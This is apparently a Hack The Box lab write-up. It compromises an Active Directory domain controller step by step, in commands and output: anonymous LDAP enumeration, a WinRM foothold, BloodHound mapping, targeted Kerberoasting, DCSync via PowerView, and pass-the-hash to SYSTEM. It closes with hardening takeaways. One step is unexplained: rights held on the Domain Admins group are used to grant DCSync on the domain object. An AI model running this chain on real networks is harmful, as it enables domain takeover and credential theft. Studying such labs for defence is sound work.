HTB: Conduit — LDAP Enumeration to WriteDACL DCSync

Enumeration

Port Scan

nmap -sCV -p- --min-rate 5000 -T4 10.10.11.112 -oN conduit.nmap

# Key open ports (Windows DC pattern):
# 53/tcp   open  domain       Simple DNS Plus
# 88/tcp   open  kerberos-sec Microsoft Windows Kerberos
# 135/tcp  open  msrpc
# 389/tcp  open  ldap         Microsoft Windows Active Directory LDAP
# 445/tcp  open  microsoft-ds
# 3268/tcp open  ldap         Global Catalog
# 5985/tcp open  http         Microsoft HTTPAPI (WinRM)
#
# Domain: conduit.htb | DC: DC01.conduit.htb

Anonymous LDAP Bind

The domain controller accepts anonymous LDAP binds, exposing the full directory. Querying all user objects and their attributes with no credentials reveals a plaintext password in the description field of the j.porter account:

ldapsearch -x -H ldap://10.10.11.112 \
  -b "DC=conduit,DC=htb" \
  "(objectClass=user)" \
  sAMAccountName description memberOf

# dn: CN=Jordan Porter,CN=Users,DC=conduit,DC=htb
# sAMAccountName: j.porter
# description: Temp pass = Summer2026!     ← plaintext credential
# memberOf: CN=Remote Management Users,CN=Builtin,DC=conduit,DC=htb

WinRM Foothold

evil-winrm -i 10.10.11.112 -u j.porter -p 'Summer2026!'
# *Evil-WinRM* PS C:\Users\j.porter\Documents>
# type C:\Users\j.porter\Desktop\user.txt
# 5d3a7c...  ← user flag

BloodHound — Mapping the Attack Path

Collecting AD Data

# From WinRM session:
upload /opt/BloodHound/Collectors/SharpHound.exe

.\SharpHound.exe -c All --outputdirectory C:\Windows\Temp\bh
download C:\Windows\Temp\bh\20260616123045_BloodHound.zip

Importing the ZIP into BloodHound and running the Shortest Paths to Domain Admins query reveals the attack path:

# j.porter  —[GenericWrite]→  svc_reports
# svc_reports  —[WriteDACL]→  Domain Admins

j.porter holds GenericWrite over the svc_reports service account. GenericWrite allows modifying any non-protected attribute including servicePrincipalName — enabling targeted Kerberoasting. Once the svc_reports TGS is cracked, that account's WriteDACL over Domain Admins allows granting DCSync rights.

Targeted Kerberoasting via GenericWrite

Setting an SPN on svc_reports

# From evil-winrm session as j.porter
Set-ADUser svc_reports -ServicePrincipalNames @{Add='HTTP/fake.conduit.htb'}

# Confirm SPN is set
Get-ADUser svc_reports -Properties ServicePrincipalName |
  Select-Object -ExpandProperty ServicePrincipalName
# HTTP/fake.conduit.htb

Requesting and Cracking the TGS

# From attacker machine — request TGS for svc_reports
GetUserSPNs.py conduit.htb/j.porter:'Summer2026!' \
  -dc-ip 10.10.11.112 \
  -request \
  -outputfile svc_reports.tgs

# Crack offline
hashcat -m 13100 svc_reports.tgs /usr/share/wordlists/rockyou.txt
# $krb5tgs$23$*svc_reports$...:R3p0rt5erv!ce2026
# Status: Cracked

Privilege Escalation — WriteDACL to DCSync

Granting DCSync Rights

svc_reports holds WriteDACL on the Domain Admins group object. DCSync requires two extended rights on the domain object itself: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Using PowerView, grant these rights to svc_reports:

# Authenticate as svc_reports in the WinRM session
$pass = ConvertTo-SecureString 'R3p0rt5erv!ce2026' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('conduit\svc_reports', $pass)

# Import PowerView
Import-Module .\PowerView.ps1

# Grant DCSync rights to svc_reports on the domain object
Add-DomainObjectAcl -Credential $cred `
  -TargetIdentity "DC=conduit,DC=htb" `
  -PrincipalIdentity svc_reports `
  -Rights DCSync

Write-Host "[+] DCSync rights granted"

DCSync — Dumping the Domain

secretsdump.py conduit.htb/svc_reports:'R3p0rt5erv!ce2026'@10.10.11.112

# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:3b4f3e5a8c2d91f7e2c4b6a9d0e1f250:::
# ...

# Pass-the-hash for interactive shell
psexec.py conduit.htb/[email protected] \
  -hashes aad3b435b51404eeaad3b435b51404ee:3b4f3e5a8c2d91f7e2c4b6a9d0e1f250

# C:\Windows\system32> whoami
# nt authority\system
# C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
# 8b3e1f...  ← root flag

Key Takeaways

• Anonymous LDAP bind should be disabled on domain controllers. Active Directory permits anonymous LDAP queries by default in older domain functional levels. Enabling ldapServerIntegrity and setting the dsHeuristics value to require signed and sealed LDAP connections prevents unauthenticated directory enumeration. At minimum, the description, info, and comment attributes on user objects must never contain credentials or sensitive operational notes — these attributes are readable by all authenticated users and often by anonymous bind.
• GenericWrite over any account is equivalent to targeted Kerberoasting capability. The ability to write arbitrary attributes on a user account includes the ability to set or clear servicePrincipalName. An account with no SPN today can become Kerberoastable tomorrow by anyone with GenericWrite. BloodHound's Shortest Paths to High Value Targets query surfaces these relationships in seconds — running BloodHound internally should be a regular purple-team exercise, not only a red-team artefact.
• WriteDACL on a group or domain object is a domain escalation path regardless of group membership. WriteDACL allows modifying the DACL of an object, which in Active Directory means granting arbitrary extended rights. On the domain naming context object, this translates directly to granting DCSync. On Domain Admins, it translates to adding arbitrary members. Neither requires administrative credentials to execute. Excessive DACL permissions are one of the most common findings in enterprise Active Directory environments and one of the least visible without purpose-built tooling.